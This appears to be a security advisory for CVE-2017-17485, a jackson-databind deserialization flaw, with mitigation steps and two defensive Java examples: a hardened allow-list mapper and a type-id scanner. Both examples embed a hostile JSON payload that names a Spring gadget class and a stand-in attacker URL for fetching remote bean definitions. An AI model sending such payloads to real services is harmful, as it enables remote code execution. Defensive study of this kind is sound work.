CVE-2017-17485: CWE-502: Deserialization of Untrusted Data in FasterXML jackson-databind
FasterXML jackson-databind through 2.8.10 and 2.9.x through 2.9.3 allows unauthenticated remote code execution because of an incomplete fix for the CVE-2017-7525 deserialization flaw. This is exploitable by sending maliciously crafted JSON input to the readValue method of the ObjectMapper, bypassing a blacklist that is ineffective if the Spring libraries are available in the classpath.
AI Analysis
Technical Summary
CVE-2017-17485 is a critical deserialization flaw in FasterXML jackson-databind, the JSON data-binding library behind a large share of Java services, affecting releases up to 2.8.10 and 2.9.0 through 2.9.3. It is one of a series of gadget-chain bypasses that began with CVE-2017-7525. The underlying weakness is polymorphic deserialization: when an application enables default typing (ObjectMapper.enableDefaultTyping()) or annotates a property of type Object, interface or abstract class with @JsonTypeInfo using a class-name type id, the JSON itself names the Java class to instantiate and ObjectMapper.readValue constructs it. The fix for CVE-2017-7525 did not remove that capability; it added a deny-list (SubTypeValidator) of class names known to be usable as gadgets. CVE-2017-17485 is a deny-list miss: with spring-context on the classpath an attacker can name a Spring class the list did not cover, the publicly documented one being the XML application-context family (org.springframework.context.support.FileSystemXmlApplicationContext), whose single-String constructor loads bean definitions from a caller-supplied location. Because bean definitions can instantiate arbitrary classes and call their methods, this yields code execution with the privileges of the application. No authentication or user interaction is needed beyond reaching an endpoint that feeds attacker-controlled JSON into a mapper configured this way; applications that never enable polymorphic typing are not exploitable through this path.
The flaw was published in January 2018 and fixed in 2.8.11 and 2.9.4 by extending the deny-list. That approach was bypassed repeatedly in later CVEs, so a build that merely carries the 2.9.4 list is not a durable fix. This record carries no CVSS vector and no known in-the-wild exploitation, which does not lessen the severity: unauthenticated RCE in a library that is a transitive dependency of countless applications is about as bad as a single bug gets, and long-lived or embedded deployments on the 2.8.x and 2.9.x lines may still be running vulnerable builds because nobody consciously chose the dependency in the first place.
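The following is an added example, not code from the page or from the Jackson project, showing the polymorphic-typing mechanism described in the summary above in both its vulnerable and hardened forms. It assumes jackson-databind 2.10 or later (the PolymorphicTypeValidator API does not exist in the 2.8.11/2.9.4 fix releases), a hypothetical application package com.example, and a placeholder URL; the Spring class name is the documented gadget and is only shown being refused.

```java
package com.example.demo;

import com.fasterxml.jackson.databind.JsonMappingException;
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.jsontype.BasicPolymorphicTypeValidator;
import com.fasterxml.jackson.databind.jsontype.PolymorphicTypeValidator;

public class DefaultTypingDemo {

    // Hypothetical application type: the only thing the hardened mapper will instantiate.
    public static class Widget {
        public String name;
    }

    // The vulnerable pattern. With default typing on, every Object-typed (or non-final)
    // property deserializes whatever class the JSON names. In 2.8.x/2.9.x the only guard
    // is the deny-list of known gadget class names, which is what CVE-2017-17485 bypasses.
    public static ObjectMapper vulnerableMapper() {
        ObjectMapper m = new ObjectMapper();
        m.enableDefaultTyping(); // deprecated since 2.10 for exactly this reason
        return m;
    }

    // The hardened pattern (2.10+): an allow-list validator consulted before any
    // constructor runs. Which gadget classes the classpath contains no longer matters.
    public static ObjectMapper hardenedMapper() {
        PolymorphicTypeValidator ptv = BasicPolymorphicTypeValidator.builder()
                .allowIfSubType("com.example.")
                .build();
        ObjectMapper m = new ObjectMapper();
        m.activateDefaultTyping(ptv, ObjectMapper.DefaultTyping.NON_FINAL);
        return m;
    }

    public static void main(String[] args) throws Exception {
        // With default typing the class travels in the JSON as the first element of a
        // two-element array. Same shape as the CVE-2017-17485 payload; the URL is a placeholder.
        String hostile = "[\"org.springframework.context.support.FileSystemXmlApplicationContext\","
                + "\"http://attacker.example/beans.xml\"]";
        String benign = "[\"com.example.demo.DefaultTypingDemo$Widget\",{\"name\":\"ok\"}]";

        Object w = hardenedMapper().readValue(benign, Object.class);
        System.out.println("allow-listed type instantiated: " + w.getClass().getName());

        try {
            hardenedMapper().readValue(hostile, Object.class);
            System.out.println("UNEXPECTED: hostile type id accepted");
        } catch (JsonMappingException e) {
            // InvalidTypeIdException: the validator denied resolution of the Spring class,
            // so no constructor ran and nothing was fetched from the network.
            System.out.println("hardened mapper refused type id: " + e.getOriginalMessage());
        }
        // vulnerableMapper() on 2.8.10 or 2.9.3 with spring-context present would instead
        // construct the Spring class here and load beans.xml. Deliberately not executed.
    }
}
```

The point of the allow-list is that it is evaluated on the class name before class loading, so it holds regardless of which libraries are on the classpath; the deny-list in the affected releases was evaluated the same way but could only name gadgets already known to the maintainers.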
Potential Impact
For European organisations the exposure is broad rather than sector-specific: jackson-databind is the default JSON binder in Spring Boot and in most Java web and REST frameworks, so any internet-facing or partner-facing API that deserialises attacker-controlled JSON into an Object-typed or otherwise polymorphic property is a candidate. Successful exploitation runs code as the application user, which usually means access to the application's databases, credentials and service accounts, followed by lateral movement, data exfiltration or ransomware deployment. Finance, healthcare, public administration and telecommunications, where Java back ends are the norm, are the obvious high-value targets. The attack does not bypass authentication; it simply needs none when the vulnerable endpoint is reachable without credentials, and a low-privilege authenticated user can exploit an internal endpoint just as well. The Spring-on-the-classpath condition is rarely a constraint in practice, because the services that embed Jackson are very often Spring-based. Since the library arrives as a transitive dependency of third-party products and in-house applications alike, the affected population is much larger than the set of teams that consciously chose it. Compromise of personal data through a long-published, patched flaw is also the kind of failure that GDPR supervisory authorities treat as inadequate technical measures, so regulatory penalties come on top of reputational damage and operational downtime.
Mitigation Recommendations
1. Upgrade jackson-databind. The deny-list fix for this CVE is in 2.8.11 and 2.9.4, but that list was bypassed again in later CVEs, so the target should be the newest 2.x release and, where polymorphic typing is needed at all, activateDefaultTyping with an allow-listing PolymorphicTypeValidator (2.10+). The deprecated enableDefaultTyping() and any @JsonTypeInfo(use = Id.CLASS) on Object-, interface- or abstract-typed properties are the exploitable configurations.
2. Inventory every application and service that carries jackson-databind, including transitive dependencies (mvn dependency:tree or gradle dependencies, filtered for jackson-databind). Also list jackson-databind-*.jar inside deployed WAR and fat-JAR archives, because shaded or vendored copies do not appear in build metadata.
3. If upgrading is not immediately possible, filter JSON input by shape rather than by class name: reject request bodies containing two-element arrays whose first element is a fully qualified class name, or an "@class" property, on endpoints that do not legitimately use polymorphism. A deny-list of class names at the perimeter is as fragile as the one inside the library.
4. Disable default typing. Where polymorphism is genuinely required, use @JsonTypeInfo(use = Id.NAME) with @JsonSubTypes so the JSON can only select among types you enumerated, never name a class.
5. Use RASP or WAF rules built on the shape criteria in item 3 to detect and block attempts against deserialization endpoints.
6. Monitor application logs for JsonMappingException and InvalidTypeIdException messages naming unexpected classes, and watch for outbound HTTP from application servers to unfamiliar hosts, since this gadget fetches its bean definitions over the network.
7. Segment and isolate critical systems so that a compromised application host cannot reach the rest of the estate directly.
8. Treat "never let input choose the class" as a secure-development rule, and review code for deserialization of untrusted data into polymorphic types.
9. Press software vendors for patched builds of products that embed jackson-databind, and verify the embedded version rather than the product release notes.
10. For Spring-based applications, do not rely on removing Spring libraries as a fix: it blocks this particular gadget only, and the next bypass used other libraries. Fix the polymorphic-typing configuration instead.
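As an added example for the filtering and monitoring steps above (not code from the page or from any vendor product), the scanner below extracts polymorphic type ids from JSON bodies using Jackson's tree model, which never instantiates application classes and is therefore safe to run on hostile input. It assumes jackson-databind 2.x, a hypothetical application package prefix com.example. for the allow-list, and constructed sample request bodies; it covers the two shapes default typing and Id.CLASS produce, the two-element wrapper array and the "@class" property.

```java
package com.example.demo;

import com.fasterxml.jackson.databind.JsonNode;
import com.fasterxml.jackson.databind.ObjectMapper;

import java.util.ArrayList;
import java.util.Iterator;
import java.util.List;
import java.util.Map;
import java.util.regex.Pattern;

public class TypeIdScanner {
    // readTree() builds generic JsonNode objects only; no type ids are honoured.
    private static final ObjectMapper TREE_ONLY = new ObjectMapper();

    // Conventional Java binary class name: lowercase package segments, capitalised class.
    // Heuristic by design; it deliberately does not match strings such as "example.com".
    private static final Pattern CLASS_NAME =
            Pattern.compile("^([a-z_$][\\w$]*\\.)+[A-Z][\\w$]*$");

    // Assumed application package. Any type id outside it is suspicious on this endpoint.
    private static final String ALLOWED_PREFIX = "com.example.";

    /** Every class name the document tries to supply as a polymorphic type id. */
    public static List<String> findTypeIds(String json) throws Exception {
        List<String> found = new ArrayList<>();
        walk(TREE_ONLY.readTree(json), found);
        return found;
    }

    /** Type ids that are not in the application's own package. */
    public static List<String> suspiciousTypeIds(String json) throws Exception {
        List<String> bad = new ArrayList<>();
        for (String id : findTypeIds(json)) {
            if (!id.startsWith(ALLOWED_PREFIX)) bad.add(id);
        }
        return bad;
    }

    private static void walk(JsonNode node, List<String> out) {
        if (node.isArray()) {
            // As.WRAPPER_ARRAY, the encoding enableDefaultTyping() uses: ["fq.ClassName", value]
            if (node.size() == 2 && node.get(0).isTextual()
                    && CLASS_NAME.matcher(node.get(0).asText()).matches()) {
                out.add(node.get(0).asText());
            }
            for (JsonNode child : node) walk(child, out);
        } else if (node.isObject()) {
            Iterator<Map.Entry<String, JsonNode>> fields = node.fields();
            while (fields.hasNext()) {
                Map.Entry<String, JsonNode> f = fields.next();
                // As.PROPERTY with Id.CLASS: {"@class": "fq.ClassName", ...}
                if ("@class".equals(f.getKey()) && f.getValue().isTextual()) {
                    out.add(f.getValue().asText());
                }
                walk(f.getValue(), out);
            }
        }
    }

    public static void main(String[] args) throws Exception {
        // Constructed request bodies, as a WAF tap or access log with body capture might hold them.
        String[] bodies = {
            "{\"name\":\"widget-1\",\"count\":3}",
            "{\"name\":\"w\",\"meta\":[\"org.springframework.context.support.FileSystemXmlApplicationContext\","
                + "\"http://attacker.example/beans.xml\"]}",
            "{\"@class\":\"com.example.demo.Widget\",\"name\":\"ok\"}",
            "{\"endpoints\":[\"example.com\",443]}"
        };
        for (String body : bodies) {
            List<String> bad = suspiciousTypeIds(body);
            System.out.println((bad.isEmpty() ? "ok      " : "SUSPECT ") + bad + "  <- " + body);
        }
    }
}
```

Run against the four samples, only the second body is reported, with the Spring class name as the offending type id; the third carries a type id but it is inside the allowed package, and the fourth shows why the class-name pattern insists on a capitalised final segment. In a servlet filter the same walk can reject the request before it reaches the real ObjectMapper; in a SIEM the reported ids are the field to alert on.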
Affected Countries
Germany, France, United Kingdom, Netherlands, Italy, Spain, Poland, Sweden, Belgium, Austria
Technical Details
- Data Version: 5.1
- Assigner Short Name: mitre
- Date Reserved: 2017-12-10T00:00:00.000Z
- CISA Enriched: true
- CVSS Version: null (no vector recorded)
- State: PUBLISHED
Threat ID: 682d983ac4522896dcbed03c
Added to database: 5/21/2025, 9:09:14 AM
Last enriched: 6/25/2025, 5:22:56 PM
Last updated: 8/11/2025, 7:30:55 AM